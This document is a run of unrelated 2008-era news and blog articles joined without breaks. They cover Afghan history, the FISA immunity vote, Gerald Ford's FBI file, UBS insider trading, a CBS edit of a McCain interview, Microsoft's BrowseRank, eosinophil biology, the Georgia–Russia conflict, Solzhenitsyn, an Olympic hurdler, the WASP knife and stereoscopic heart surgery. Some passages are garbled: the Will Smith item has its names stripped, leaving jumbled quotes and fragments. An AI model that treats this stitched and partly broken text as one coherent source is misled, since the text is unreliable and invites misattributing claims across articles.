Afghanistan and its capital Kabul have more often been parts of an outside empire , or a region coveted by other empires , than the center of an empire .
In relatively recent times , the region that is now Afghanistan was at the center of Rudyard Kipling ’s remarkably evocative and sensitive novel Kim , in a Great Game played for power , influence , and access to resources between the British Empire driving north from India and the czarist Russian Empire , pushing south from what are now the " stans " of central Asia .
The Brits tried to place a pliant ruler on the throne in Kabul in 1838 , leading to the first Anglo - Afghan war ( 1838 - 42 ) .
The British established temporary domination , but disaffected Afghan tribes gathered to resist , eventually forcing a retreat of 16,000 British through snowbound passes in which they were ambushed and killed , with one always purposely left alive to tell the tale .
It was n’t until almost 40 years later that the Brits recovered enough to impose an agreement that the British would control Afghan foreign policy and leave it to the locals to handle internal governance .
Meanwhile , on the other side of the country , the Russians variously made advances and suffered setbacks in their efforts to control Afghanistan , viewing it mainly as a buffer against British influence .
But neither foreign power was able to keep the country / region under control for long .
The various tribal and ethnic groups in Afghanistan tended to fight or ignore one another in what might be viewed as normal times , but when foreign invaders came into the picture , they were usually able to cooperate long enough to oust the outsiders , or at least harass them sufficiently that they would either leave or cede real control to the locals .
An Ethnic Mosaic
A complicating factor in any effort to wield centralized control over Afghanistan is the multiplicity of ethnic groups that centuries of migration , conquest , and resistance have left as reasonably long - term inhabitants .
Thanks to fairly constant political turmoil , population estimates are not reliable to the tenth decimal , but in 1996 about 40 percent of Afghans were Pashtuns , who are themselves divided into two main tribal groups , the Durrani and the Ghilzai , as well as other subgroups .
Tajiks made up about 25 percent of the population , with Hazaras at 18 percent , Uzbeks at 6 percent , and Turkmen at 2 to 3 percent .
Of course , some of the Tajiks and Uzbeks have relationships with their ethnic kin in Tajikistan and Uzbekistan , and perhaps divided loyalties .
Just to complicate matters , the southern border with what is now Pakistan , the Durand Line , was drawn across a map by a British diplomat in the 19th century right through the traditional Pashtun - settled region .
Thus those in the area have little or no loyalty to Islamabad or Kabul , but treat the border as the artificial construct that it is .
The border does make things convenient for insurrectionists , rebels , terrorists , and so forth , since a group attacking a target in Afghanistan , for example , can retreat over the artificial border into Pakistan , across which Afghan ( or U.S. or NATO ) forces are reluctant to move too aggressively .
Thus groups with safe havens in the region can bedevil both central governments rather handily .
Throw in the fact that in Pakistan ’s Inter - Services Intelligence agency ( ISI ) , as the CIA has recently publicly complained , though everybody has known it perfectly well , at least some elements have cooperative connections with the Taliban .
This is hardly surprising , given that the ISI was a big assisting factor in installing the Taliban in power in the 1990s .
The calculation from Pakistan ’s perspective at the time was that the relative stability offered by the Taliban was less troubling than the civil war and unrest in an adjacent country that followed the withdrawal of Soviet occupation .
Strictly Limited Power
Certain sectors of conventional wisdom blame the instability and the eventual Taliban takeover of Afghanistan on the U.S. and other Western powers .
Once the Soviets retreated , this narrative goes , the U.S. with its short attention span lost interest in Afghanistan , paving the way for the Taliban takeover .
The implicit assumption behind the narrative , however , is that if the U.S. had remained engaged it could have prevented the Taliban takeover .
As Ted Carpenter , vice president for defense and foreign policy studies at the libertarian Cato Institute , who has a new book out , Smart Power , told me , however , the U.S. remained a major aid donor during the period .
That did n’t give the U.S. much political influence , though .
The U.S. and other powers had channeled their aid to the anti-Soviet resistance during the 1980s through Pakistan ( mainly the ISI ) and continued to let Pakistan , which lives next door , after all , play the major political role .
Even if the U.S. had decided to buck Pakistan and tried to prevent the accession of the Taliban in the 1990s , it is most unlikely it could have done so .
A great many of the unpleasant forces at large in the world have at least some of their roots in previous U.S. and Western interventions in the region , from the very development of al - Qaeda to the growth of the Taliban to various freelance or loosely affiliated jihadists .
Before Americans sign off on the new Obama - McCain consensus that it ’s time to make a more extensive military commitment in Afghanistan , we should ask the question Gen .
David Petraeus is said to have asked when he commanded his first Iraqi mission in the Kurdish region right after the invasion : " Tell me how this ends . "
Advertisements
As expected the Senate passed the FISA bill today complete with full immunity for the telecoms who participated in President Bush ’s warrantless wiretapping program .
The bill passed by a vote of 69 - 28 .
Democratic presidential candidate Barack Obama held to his word by voting in favor of the Dodd - Feingold amendment that would have removed the telecom immunity from the bill , but the amendment failed to pass by a vote of 32 - 66 .
Democratic heavyweights Joe Biden , Harry Reid , Hillary Clinton , and Robert Byrd all voted to remove the immunity clause from the bill , but Obama voted for the final bill .
An amendment proposed by Sen. Arlen Specter ( R - PA ) that would have required the lawsuits be dropped unless a federal court found that the government violated the law was withdrawn after the vote was 61 - 37 opposed .
Another amendment that would have held off dismissing the lawsuits until after Congress got a report on the bill failed by a vote of 42 - 56 .
Advertisements
Before the vote , Senate Majority Leader Harry Reid ( D - NV ) explained why he opposed the bill , “ I opposed the version originally passed by the Senate .
And although improvements have been made in the version now before us , this legislation continues to contain provisions that will lead to immunity for the telecommunications companies who cooperated with the Bush Administration ’s illegal warrantless wiretapping program .
For that reason , I will vote no . ”
Sen . Russ Feingold ( D - WI ) talked about the importance of getting the telecom immunity out of the bill , “ These lawsuits may be the last chance to obtain a judicial ruling on the lawfulness of the warrantless wiretapping program .
It ’s bad enough that Congress abdicated its responsibility to hold the President accountable for breaking the law .
Now it is trying to absolve those who allegedly participated in his lawlessness .
Mr. President , this body should be condemning this administration for its law - breaking – not letting the companies that allegedly cooperated off the hook . ”
Of course Feingold is right , but with this being an election year , and both Democrats and Republicans being terrified of voting against something that could be painted by their opponents as softness on terrorism , passage of this bill was a given .
This is a sad day for American privacy rights , and this bill sets a precedent that will almost certainly come back to haunt us later .
Feingold ’s Remarks
Reid Statement
Former President Ford secretly told FBI about panel 's doubts on JFK murder Associated Press
Published : Saturday August 9 , 2008
Print This Email This Former President Ford secretly advised the FBI that two of his fellow members on the Warren Commission doubted the FBI 's conclusion that John F. Kennedy was shot from the sixth floor of the Texas Book Depository in Dallas , according to newly released records from Ford 's FBI files .
Ford , still a congressman at the time , also told a senior FBI official about internal panel disputes over hiring staff , Chief Justice Earl Warren 's timetable for completing the final report on the assassination and what panel members said about the FBI .
In turn , Assistant FBI Director Cartha " Deke " DeLoach confidentially advised Ford of FBI Director J. Edgar Hoover 's position on panel disputes ; discussed where leaks were coming from ; and , with Hoover 's personal approval , loaned him a bureau briefcase with a lock so he could securely take the FBI report on the 1963 assassination with him on a ski trip .
The new details were included in 500 pages of the FBI 's large file on Ford , released in part this past week in response to requests under the Freedom of Information Act that The Associated Press and others made on the day Ford died in December 2006 .
The FBI intends to release additional documents about Ford in several batches , all with parts censored for law enforcement and privacy reasons .
That Ford served as the FBI 's eyes and ears inside the commission has been known for years .
Long ago , the government released a 1963 FBI memo that said Ford , then a Republican congressman from Michigan , had volunteered to keep the FBI informed about the panel 's private deliberations , but only if that relationship remained confidential .
The bureau agreed .
It was also well - known Ford was an outspoken proponent of the bureau 's conclusion that Lee Harvey Oswald killed Kennedy acting alone .
A newly released memorandum provides more details about Ford 's role as the FBI 's informant .
DeLoach wrote on Dec. 17 , 1963 , to outline what Ford told him in the congressman 's office about the commission meeting the day before .
" Two members of the commission brought up the fact that they still were not convinced that the President had been shot from the sixth floor window of the Texas Book Depository , " DeLoach wrote .
" These members failed to understand the trajectory of the slugs that killed the President .
He stated he felt this point would be discussed further but , of course , would represent no problem . "
There was no explanation of what Ford meant by " no problem . "
Warren Commission records released in 1997 revealed that in the final report Ford changed the staff 's original description of one of Kennedy 's wounds .
Ford said then he only made the description more precise .
Skeptics said Ford 's wording falsely made the wound seem higher on the body to make the panel 's conclusion that one bullet hit both Kennedy and Texas Gov. John Connally more plausible .
DeLoach also wrote that Ford wanted to take the FBI 's confidential assassination report on a ski vacation but had no way to do so " in complete safety . "
DeLoach recommended lending Ford a bureau briefcase with a lock .
The bottom of the memo contains a handwritten " OK " over Hoover 's distinctive initial " H , " which he regularly used in commenting on memos .
Most of the newly disclosed documents describe the relationship between the FBI under Hoover and influential members of Congress or the judiciary once Hoover was convinced that they were allies .
Hoover rewarded Ford with personal notes that congratulated him on re-election and on awards , thanked Ford for publicly defending the bureau and expressed sympathy over the death of Ford 's mother .
In turn , Ford responded with private and public praise for Hoover and the FBI .
Like other friendly officials , Ford was granted favors .
Some Ford sought : a photo of Hoover , background checks on a maid the Fords wanted to hire and on a man with a Swedish accent seeking public office in Ford 's district but who had not answered all his neighbors ' questions about his personal background .
Others were surprise gifts , such as a signed copy of Hoover 's book on communism .
Ford was elected to Congress in 1948 .
Hoover first congratulated him on his re-election in 1952 and thereafter .
An internal FBI memo in 1965 said that , " though we did experience some difficulty with all the members of the Warren Commission , Ford was of considerable help to the Bureau . "
Many of the newly released records describe the bureau 's controversial surveillance of anti-war and civil rights protesters as the FBI reported on plans for protest demonstrations at Ford 's public appearances as a congressman , vice president and president .
Two documents provide a rare glimpse of the depth of security fears during the Cold War : - A memo from Nov. 9 , 1965 , said the FBI performed a security check at Ford 's request of telephones at his home in Virginia , his line at the phone company 's central office and all points between .
The FBI found no bugs , but a foreman said installation of new touch - tone dialing equipment in the area may have caused " some inadvertent noise on Mr. Ford 's line . "
- A memo from Dec. 2 , 1959 , showed the Navy was considering inviting Ford to a strategy conference at the Naval War College and asked the FBI - fully 11 years after Ford was first elected to Congress - whether Ford had any " subversive nature . "
The famously tightlipped FBI had amassed a large file on Ford , but replied only that when Ford had applied to work for the FBI in 1942 its background investigation " revealed no pertinent derogatory information . "
PDF
Links for documents : 1959 Memo Regarding Ford's ' Subversive Nature ' 1965 Memo on Security Check on Ford 's Phone 1963 Memo : 2 Warren Commission Members Doubted FBI 's Conclusions in Kennedy Assassination
You & Us .
Already in trouble for allegedly helping rich people avoid taxes and screwing over clients with auction rate securities , UBS hits the headlines again -- this time for insider trading .
Did the company advise clients to scoop up call options on DRS Technologies and American Power Conversion just before they announced takeover deals ?
DealBook : Federal regulators filed insider trading charges on Friday against unidentified individuals who are accused of making suspiciously well - timed purchases of call options in two companies before they announced multibillion - dollar mergers .
The case was brought in Federal District Court in New York against “ one or more unknown purchasers ” of call option contracts to buy shares of the military contractor DRS Technologies and American Power Conversion , a power and cooling services company .
DRS is in a pending deal to be acquired for $ 3.94 billion by Finmeccanica of Italy ; American Power was bought by the French engineering group Schneider Electric for $ 6.1 billion last year .
Through an account at UBS in Zurich , the buyers made “ well - timed purchases ” of call options of DRS and American Power that yielded profits of about $ 3.3 million , the Securities and Exchange Commission said .
See Also :
Mass AG : UBS Stuffed Clients Full Of Auction Rate Securities Just To Get Them Off Books
UBS to Execs : Do n't Go To US ... Because You Might Get Arrested
Demand destruction for oil and gas is real .
Just ask the environmentally - friendly and energy - efficient Amtrak ( WSJ ) :
The number of people riding Amtrak surged 13.9 % in July from a year earlier , as high gas prices caused more commuters to rely on intercity rail .
But many Amtrak trains are getting overcrowded , and a backlog of infrastructure problems stands in the way of expanded service .
Since last fall , Americans have been driving less while Amtrak usage has steadily increased .
The latest figures suggest that the migration from highways to rail is accelerating .
So does America 's newfound love of trains mean we 'll have a new European - style high - speed service on the way ?
Keep dreaming :
" There 's two railroads out there , " [ Amtrak President Alex ] Kummant said .
" There 's the one we run every day , and there 's the one everybody imagines is out there . "
Apparently years of eminent domain proceedings will stall the imaginary one .
And will the sudden demand cure the perpetually bankrupt Amtrak 's financial woes ?
We 'll believe it when we see it .
See Also :
Upside of $ 130 Oil : Railroads Surge ( UNP , CSX , NSC )
CBS covers - up humiliating McCain error , misleads national audience
Following up on the last post , John McCain , in response to a question from CBS anchor Katie Couric , demonstrated bizarre confusion about the basics of the U.S. surge policy in Iraq .
McCain got the basic timeline and history of the surge backwards , insisting that the surge prompted the Anbar Awakening , which is the opposite of reality .
Given that McCain is betting his entire campaign on the surge and his expertise , I argued that this mistake is arguably the most serious by a presidential candidate in years .
Which is why it ’s more than a little odd that CBS News not only edited McCain ’s humiliating error out of its broadcast , but even shuffled the interview around to make McCain ’s response less ridiculous .
For those of you who ca n’t watch clips online , the video shows a report — partially from MSNBC ’s Keith Olbermann and partially from The Jed Report — that shows , side - by - side , the original CBS News interview , and what CBS News actually aired .
The network showed viewers Couric ’s question in full , but instead of airing McCain ’s actual response — the one that showed McCain getting the basics of the surge backwards — CBS took a different answer to a different question and pasted it into the broadcast , leaving viewers with the impression that it was McCain ’s actual response to Couric ’s inquiry .
Someone needs to lose their job over this .
It ’s curious , to put it mildly , on multiple levels .
Why would CBS News cover - up arguably the biggest candidate error of the entire presidential campaign ?
Why would CBS News mix - and - match McCain ’s responses to make him appear less incompetent ?
Why would CBS News broadcast a question but not the answer to the question ?
Why would CBS News post the entire actual interview online , making it easy for us to see their mischief ?
Why would CBS News deliberately take the most newsworthy element of the interview , and leave it on the editing room floor ?
Why did n’t Katie Couric hear McCain ’s ridiculous answer , and ask a follow - up question seeking clarification ?
On balance , McCain ’s striking ignorance is clearly more important than CBS News ’ journalistic malpractice .
But it ’s nevertheless hard to know what the network was thinking .
I ’d just add that around the same time that McCain was demonstrating scandalous ignorance about U.S. policy in Iraq , and CBS News was covering that ignorance up , McCain ’s campaign was whining about the media going easy on Barack Obama .
The irony is rich .
Most people think that when a dog drinks , he creates a kind of spoon with the top of his tongue and brings liquid back to his mouth .
When looking at a dog lapping at a bowl of water in real time , it certainly seems this way .
But if you slow down a film of the process at around 300 frames by second , things are not really as they appear .
Video after the jump .
[ Picture source : Flickr ]
A research paper BrowseRank : Letting Web Users Vote for Page Importance delivered at a conference in Singapore this week , highlights Microsoft Asia Research 's alternative to Google 's PageRank algorithm , BrowserRank - " The more visits of the page made by the users and the longer time periods spent by the users on the page , the more likely the page is important .
We can leverage hundreds of millions of users ' implicit voting on page importance , " .
The new process , in theory , ranks sites based on their usage , and user behavior patterns .
Google 's algorithmic stew for rankings remains a great mystery , and an ever changing set of goalposts that are constantly gamed by companies looking to leverage search results to drive traffic , and drive revenues .
Microsoft sees Google 's strength in this regard as being its weakness , too , arguing that web developers have many opportunities to influence the ranking system , unfairly .
BrowserRank , on the other hand , would actually try and take a look at user behavior on a site , Microsoft arguing that the more people are engaged by a site , the more likely it is that it has relevance .
Search is of tremendous importance to the Internet for many reasons .
For one thing , search engines are highly influential middlemen that steer users to Web sites they may not be able to find on their own .
For another , queries typed into search engines can be powerful -- and in Google 's case highly profitable -- indications of what type of advertisement to place next to the search results .
But Microsoft lags leader Google and No. 2 Yahoo in search .
It 's trying hard to catch up , for example with unsuccessful proposals to acquire Yahoo or its search business that would cost the company billions of dollars .
And Microsoft just bought search start - up Powerset .
Google is n't putting all its eggs in the PageRank basket , though .
" It 's important to keep in mind that PageRank is just one of more than 200 signals we use to determine the ranking of a Web site , " the company said in a statement .
" Search remains at the core of everything Google does , and we are always working to improve it . "
“ Me and Tom have to work together .
I think that would just be genius .
We have been pitching some ideas back and forth and trying to find a movie that will be big enough for both of us . ”
“ He is a beast .
I want to work with people who are going to force me to bring my game up . ”
is planning to make a film with .
The “ ” actor revealed he has been trying to find a suitable project for them to star in , but has so far been unsuccessful .
Will said : The actor ” who is close friends with the “ ” actor and his wife ” also said Tom is a “ warm - hearted ” person .
Will has also expressed an interest in teaming up with “ ” actor .
He added : ‘ Hancock ’ , also starringand , sees Will ’s alcoholic superhero character employ a PR expert to improve his image .
199 shares Share
Tweet
Pin
Pocket
Flipboard
Western Australia is the largest state in the country ; in fact , it occupies a third of the country ’s western side .
It shares borders with two other Australian regions : Northern Territory and South Australia .
Due to its size , Western Australia accounts for 11 % of the country ’s total population with a population count of 2.6 million .
Aside from that , tourists from all over the world flock here as they want to experience the many natural and manmade attractions waiting to be explored for those who travel to Western Australia .
As mentioned above , the natural features of Western Australia have contributed to the influx of tourists and the growth of the tourism industry .
Visitor statistics reveal that for the year 2015 , there were up to 9.3 million tourists who travel to Western Australia .
Meanwhile , there are over 19 million day trip visitors from other Australian states .
For the year 2015 , the tourism industry in the state earned up to $ 9 Billion from the tourism industry alone .
According to economic experts , the consistent rise in the number of people who travel to Western Australia over the past 2 - 3 years has contributed to stabilizing the state ’s economy despite the continued decline of the Australian dollar in the global market .
The tourism draw of Western Australia is not surprising at all , especially for those who have been to the state before .
There are several notable eco-regions throughout Western Australia , each with its own specific features to offer tourists who travel to Western Australia .
The Kimberley region ’s sandstone gorges are one example of that .
Meanwhile , the Margaret River is a wine - producing region that is flocked by wine enthusiasts .
You can also pay a day trip to Shark Bay , which is a UNESCO World Heritage Site .
In terms of climate , Western Australia has a Mediterranean climate due to its proximity to the Indian Ocean and the coastal location .
Some parts of the state is heavily forested and comprised of bio -diverse terrestrial habitats .
However , the northern tropical regions of the state is an exception .
Specifically , the Kimberley region has a hot monsoonal climate .
In fact , rain is a rarity from the period of April to November .
Snow is also rare in the state .
Where I ’ve Been to in Western Australia
Shark Bay
Pinnacle Desert
Bungle Bungle Mountain Range
Tropic of Capricorn
Purnlulu National Park
Kimberley , Western Australia
Echnida Chasm , Western Australia
Exmouth , Western Australia
Shark Bay
Cable Beach
Where to Go in Western Australia
Ningaloo Marine Park :
If you love the ocean , you need to head to the Ningaloo Marine Park on your travel to Western Australia .
This protected marine area spans up to 260 kilometers in size .
You have plenty of activities to do such as snorkeling the Coral Bay or taking a 4WD adventure at the sand dunes .
The Pinnacles :
This is the purest example of a desert landscape in Western Australia .
The landscape is filled with yellow sand dunes and rock spires even though the Indian Ocean is just a few miles away .
You cannot miss this attraction when you travel to Western Australia .
Pinnacle Desert
The Kimberley : This is another popular attraction for those who travel to Western Australia .
When in Kimberley , enjoy a camel ride or go sight - seeing at the beehive domes of Purnlulu National Park .
Cable Beach :
This 22 - km stretch of white sand is another famous attraction in the state .
The beach is set against red ochre cliffs and the gorgeous and pristine Indian Ocean waters .
This is a great place to enjoy the sunrise or sunset .
Cable Beach
Karijini National Park :
This national park is located in Pilbara in Western Australia .
Prepared to be humbled by the awe - inspiring beauty of this natural attraction .
When you visit the park , you will be treated to marbled rock tunnels , rock pools , waterfalls , and other similar features you ’d expect to find in an eco retreat .
Travel to Western Australia Resources
U.S. and Swiss scientists have made a breakthrough in understanding how a type of white blood cell called the eosinophil may help the body to fight bacterial infections in the digestive tract , according to research published online this week in Nature Medicine .
Hans - Uwe Simon , from the University of Bern , Switzerland , Gerald J.Gleich , M.D. , from the University of Utah School of Medicine , and their colleagues discovered that bacteria can activate eosinophils to release mitochondrial DNA in a catapult - like fashion to create a net that captures and kills bacteria .
Eosiniphils , which comprise only 1 to 3 percent of human white blood cells , are known to be useful in the body 's defense mechanisms against parasites .
But their exact role in the immune system is not clear .
Unlike other white blood cells , which are distributed throughout the body , eosinophils are found only in selected areas , including the digestive tract .
Mitochondria – often referred to as the power plants of the cell – are components within cells that are thought to descend from ancient bacteria .
Although most cellular DNA is contained in the nucleus , mitochondria have their own DNA .
" This is a fascinating finding , " says Gleich , professor of dermatology and internal medicine at the University of Utah and a co-author of the study .
" The DNA is released out of the cell in less than a second . "
Previous research has shown that eosinophils secrete toxic granule proteins during parasite infections and that these granule proteins kill bacteria .
Simon , Gleich , and their colleagues found that when eosinophils are stimulated by infection , such as E. coli , they rapidly secrete mitochondrial DNA .
This DNA binds to the granule proteins and forms a net that is able to trap and kill bacteria .
The researchers also found higher levels of eosinophils were linked to improved survival and lower numbers of bacteria in the blood of mice with widespread bacterial infections .
The toxic proteins released by eosinophils are not always helpful to the body , however , and can damage nearby tissues .
The inflammation in some types of asthma and Crohn 's disease , a chronic inflammatory disease of the bowel , is attributed to eosinophils .
In fact , Simon and his team first found evidence of these DNA - protein traps in tissue taken from the digestive tracts of people with Crohn 's disease .
Earlier studies suggested another type of white blood cell – the neutrophil – also expels DNA and granule proteins to kill bacteria .
However , this DNA comes from the nucleus and its release causes the neutrophil to die .
The eosinophil is able to survive after expelling its mitochondrial DNA .
The researchers hope to learn more about how eosiniphils expel mitochondrial DNA .
They speculate that the explosive mechanism might rely on stored energy , similar to the way plants release pollen into the air .
" We do n't know how eosinophils are capable of catapulting mitochondrial DNA so quickly , " says Gleich .
Future investigation may focus on how this energy is generated and how this new knowledge can be applied to the treatment of bacterial infections and inflammatory diseases related to eosinophils .
Those who rush to judgment on what ’s happening in the Caucasus , or those who seek influence there , should first have at least some idea of this region ’s complexities .
The Ossetians live both in Georgia and in Russia .
The region is a patchwork of ethnic groups living in close proximity .
Therefore , all talk of “ this is our land , ” “ we are liberating our land , ” is meaningless .
We must think about the people who live on the land .
Image Credit ... Alex Nabaum
The problems of the Caucasus region cannot be solved by force .
That has been tried more than once in the past two decades , and it has always boomeranged .
What is needed is a legally binding agreement not to use force .
Mr. Saakashvili has repeatedly refused to sign such an agreement , for reasons that have now become abundantly clear .
The West would be wise to help achieve such an agreement now .
If , instead , it chooses to blame Russia and re-arm Georgia , as American officials are suggesting , a new crisis will be inevitable .
In that case , expect the worst .
In recent days , Secretary of State Condoleezza Rice and President Bush have been promising to isolate Russia .
Some American politicians have threatened to expel it from the Group of 8 industrialized nations , to abolish the NATO - Russia Council and to keep Russia out of the World Trade Organization .
These are empty threats .
For some time now , Russians have been wondering :
If our opinion counts for nothing in those institutions , do we really need them ?
Just to sit at the nicely set dinner table and listen to lectures ?
Indeed , Russia has long been told to simply accept the facts .
Here ’s the independence of Kosovo for you .
Here ’s the abrogation of the Antiballistic Missile Treaty , and the American decision to place missile defenses in neighboring countries .
Here ’s the unending expansion of NATO .
All of these moves have been set against the backdrop of sweet talk about partnership .
Why would anyone put up with such a charade ?
By Michael Nicholson
Lecturer in Russian , Oxford University
Solzhenitsyn owed much to the great Russian 19th - Century authors
As a 10 - year - old Alexander Solzhenitsyn had already read Tolstoy 's War and Peace and was trying his hand at writing stories and poems .
Later , as a student , he would embark upon a vast historical epic of his own , harking back to Tolstoy , but devoted to the 1917 Russian Revolution .
For Solzhenitsyn was a passionate Leninist in those early years .
His literary efforts continued throughout his youth and adolescence .
Even in a Stalinist hard labour camp in the 1950s , Solzhenitsyn managed to compose some 12,000 lines of poetry in his head , choosing verse as an aid to his already formidable memory .
His imprisonment in the Gulag system not only gave him a theme for his writings , but taught him valuable lessons .
Hitherto , his life had been an enthusiastic gallop : he was bright , ambitious and confident of the triumph of world revolution and of his part in it .
By the time he emerged from camps and exile in the mid-1950s much had changed .
His glib political views had given way to a new scepticism .
His forward - thrusting optimism had been tempered by setbacks , by reflection and self - analysis .
Not only did Solzhenitsyn now rediscover his Russian patriotism and the Christian faith of his boyhood , but he came to realise that a strident , assertive and accusing voice was damaging to his literary efforts .
Gulag prisoners endured hunger , hard labour and bitter cold
At that time , Solzhenitsyn experimented with writing plays ( again in his head ) , turning the confined settings of his imprisonment to advantage , confining the action to a single day , banishing himself from centre stage in favour of a wider cast of characters .
Microcosm of tragedy
It was in 1951 , while still in Ekibastuz labour camp , that Solzhenitsyn conceived the idea of writing a work about the Gulag - not the heroic biographical fiction of his youth , but a short work , in which a single camp is seen through the course of one pretty good day , by a prisoner who had formerly been peasant .
Ivan Denisovich 's story unfolds with little rage and accusation , and his experiences are not wrapped in intellectual , historical or moral generalisation .
This tale of Ivan Denisovich 's ordinary day launched Solzhenitsyn's career as a writer a decade later , when Soviet leader Nikita Khrushchev authorised its publication to bolster his own attacks on Josef Stalin and his legacy .
The novel 's understatement involves and activates the reader : if this was a relatively good camp , and this day a comparatively happy one , then what must life have been like in the savage camps of the north and of Kolyma in the far east ?
And how many millions of days - bad and worse - were lived through by those millions of Soviet citizens banished to Stalin 's camps over the years , very many of them never to return ?
ALEXANDER SOLZHENITSYN
Born : 11 December 1918 1945 : sentenced to eight years for anti-Soviet activities 1962 : One Day in the Life of Ivan Denisovich published in Russia 1970 : Awarded Nobel Prize for Literature 1974 : First volume of The Gulag Archipelago published 13 February 1974 : Exiled from his native Russia 1994 : Returns to Russia 3 August 2008 : dies in Moscow
In his own words Solzhenitsyn stands in a thoroughly Russian tradition , which imposes upon the writer a duty not simply to write well , but to voice the pains and aspirations of his society .
This civic obligation is one Solzhenitsyn felt acutely , and the post -Modernist relativism of the late 20th Century is alien to him .
His is a tradition that can be used to justify a prophetic , didactic , even tub - thumping approach .
Solzhenitsyn was , after all , one who , as much as anyone , agonized over the crimes and miseries endured by his compatriots , both before the collapse of the Soviet Union and in the turbulent new Russia of today .
For Solzhenitsyn , right and wrong , good and evil , undoubtedly do exist .
However , as he first expressed it in a poem written in his head in the camps nearly 60 years ago , the dividing line between good and evil passes not between warring parties , ideologies , armies , but runs through the heart of each individual and flickers ceaselessly to and fro .
Solzhenitsyn's best writing draws its power and vitality from this tension between his sense of mission - the writer as " second government " , as he once put it - and his awareness as a writer of the need to stifle his own rage , to exercise " self - limitation " , to condense his experience and leave space in his fictional worlds for readers to enter and relive that experience for themselves .
Political fame and notoriety attended his entire career , but in One Day in the Life of Ivan Denisovich , as too in longer works , such as The First Circle , Solzhenitsyn still contrived to create books that outlived the political sensation of their debut .
It is a very Russian achievement .
Michael Nicholson has published several works on Solzhenitsyn , including Solzhenitsyn in Exile : Critical Essays and Documentary Materials .
E-mail this to a friend Printable version Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
Olympic US Hurdler Lolo Jones Poised For Gold Medal Win ( Photos )
is an American track and field athlete who has won a world championship and two American titles in hurdles competition .
She won three NCAA titles during her stellar career at LSU .
The LSU hurdler fell near the end of her 2004 qualifying race and the stumble cost her a spot at the Athens Games .
Lolo , a former state champion sprinter and hurdler from Des Moines , Iowa , had a breakthrough year in 2006 and won her first national title in 2007 .
Lolo was peaking at the right time , having earned her spot of the 2008 U.S. team with the fastest time in the world during the qualifying finals .
The 100 meter hurdles finals were Tuesday night in the magnificent Bird 's Nest Stadium .
She went up against two other U.S. team members : Damu Cherry and Dawn Harper .
Lolo 's roots are a mix of Norwegian , French , German , Irish , American Indian and African American .
She tells people she is black and white .
The 26 year old is from a family of six children who were at one time homeless and living in a church basement while their father was in jail .
Jones believed that winning a gold medal at Beijing would be a life changing experience for her .
It would have surely establish the athlete as the new face of the sport , like her predecessors Florence Griffith - Joyner , Gail Devers and Marion Jones .
Her goal , though , is simpler :
" I 've been watching the Olympics since I was a little kid , and honestly , I would just like to inspire someone out there .
Our sport has been thrown in the garbage the last couple of years , with drugs and the attitude of some athletes .
I know I can reach somebody and I just want to do it in a positive way . "
Unfortunately it was n't to be .
The hurdler faltered and her teammate Dawn Harper took GOLD - photos here .
More photos below .
Remember the WASP Knife we posted last month that injects a ball of compressed gas into the stabee and explodes their organs ?
Well now the company has released a video of the knife versus a watermelon .
After all , nobody can sell deadly knives like a jackass in a wetsuit and safety goggles stabbing a watermelon in his backyard .
If this was an infomercial I 'd have called immediately and gotten two and a free LED keychain bonus gift .
Just imagine all the time you could save carving the Thanksgiving turkey .
Minutes .
Hit the jump for disturbing watermelon carnage .
Seriously ,
If you can blow up a watermelon with this thing , I do n't even wanna know what you can do to a cantaloupe .
Youtube
Thanks Josh , I 've never been more scared of a knife before in my life .
Surgery has been done inside some adults ' hearts while the heart is still beating , avoiding the need to open the chest , stop the heart and put patients on cardiopulmonary bypass .
But to perform intricate beating - heart operations in babies with congenital heart disease or do beating - heart complex repairs in adults , surgeons need fast , highly sophisticated real - time imaging that allows them to see depth .
In an NIH - funded study featured on the cover of the June Journal of Thoracic and Cardiovascular Surgery , cardiac surgeons from Children 's Hospital Boston report good results with a simple technology borrowed from the gaming industry : stereo glasses .
The researchers , led by Pedro del Nido , MD , and Nikolay Vasilyev , MD , of Children 's department of cardiac surgery , had already been testing a three - dimensional ultrasound imaging system .
But although the images are 3D and displayed in real time , they give little indication of depth .
In animal tests , surgeons trying to navigate surgical tools inside the heart became disoriented when guided by these images .
Del Nido , chief of Cardiac Surgery at Children's , realized that what they needed was stereoscopic vision .
Watching the flat picture on the computer screen was like watching a baseball game on TV , he says .
" It 's good enough to follow what 's happening in the game , but you could never grab a ball in mid-flight , " del Nido explains .
So collaborator Robert Howe , PhD , of Harvard University , plucked a solution from video games -- splitting computer images in two and cocking them at slightly different angles .
When wearing gamers ' flickering glasses , users can see ultrasound images of the beating heart as a hologram .
" You definitely have depth perception , " says Vasilyev .
" You feel like you 're inside the heart chamber . "
Vasilyev tested the glasses while operating on pigs with an atrial septal defect , a common form of congenital heart disease in which there is a hole in the wall dividing the heart 's upper chambers .
Vasilyev closed each defect using a catheter carrying a tiny patch , threaded into the heart through a vein .
Using another device , he fastened the patch around the hole with tiny anchors .
In all , he placed 64 anchors : 32 under standard 3D ultrasound guidance , and 32 using the stereoscopic vision display .
Using the stereoscopic display , Vasilyev was able to place the anchors 44 percent faster than with the standard display ( 9.7 versus 17.2 seconds ) .
The tip of the anchoring device also navigated more accurately -- deviation from the ideal path averaged 3.8 millimeters , as compared with 6.1 millimeters , a 38 percent improvement .
The accuracy of anchor placement did n't differ significantly between the two sets of tests , perhaps because of Vasilyev 's high level of experience and the availability of tactile information to help guide the final step of driving in the anchors .
However , the speed of the anchor placement improved significantly .
The researchers believe that the ability to precisely navigate tools inside the beating heart will minimize risk to neighboring heart structures .
Clinical trials of beating - heart surgery with the patching system could begin in children with ASDs this year , Vasilyev says .
Del Nido believes that stereoscopic imaging -- coupled with recent advances in catheter - based surgical tools -- will eventually allow surgeons to do much more complex operations on beating hearts , such as closing more complicated holes , shaving away excess tissue or repairing fast - moving structures like mitral or aortic valve leaflets .
" We look at some very unusual cardiac anatomy , " he says .
" Half the battle is figuring out what the structure is without opening up the heart . "
For children , being able to do beating - heart surgery is a real advantage , del Nido adds .
The large incisions can scar the heart and disrupt its rhythm , occasionally requiring a pacemaker .
Opening the heart invites infection , and air bubbles can slip into the bloodstream and damage the brain .
Running blood through a bypass machine can sometimes launch an inflammatory response , damaging organs throughout the body .
And even in uncomplicated open - heart surgeries , recovery times are weeks to months .
The real - time stereoscopic visualization system was designed to handle and render 30 MB of data every second .
The renderer was implemented on a GeForce FX 7800 ( nVidia Corp. , Santa Clara , Calif . ) .
The work was supported in part by the National Institutes of Health .
The American Psychological Association has been racked with controversy over the role of psychologists in Bush regime detainee interrogations .
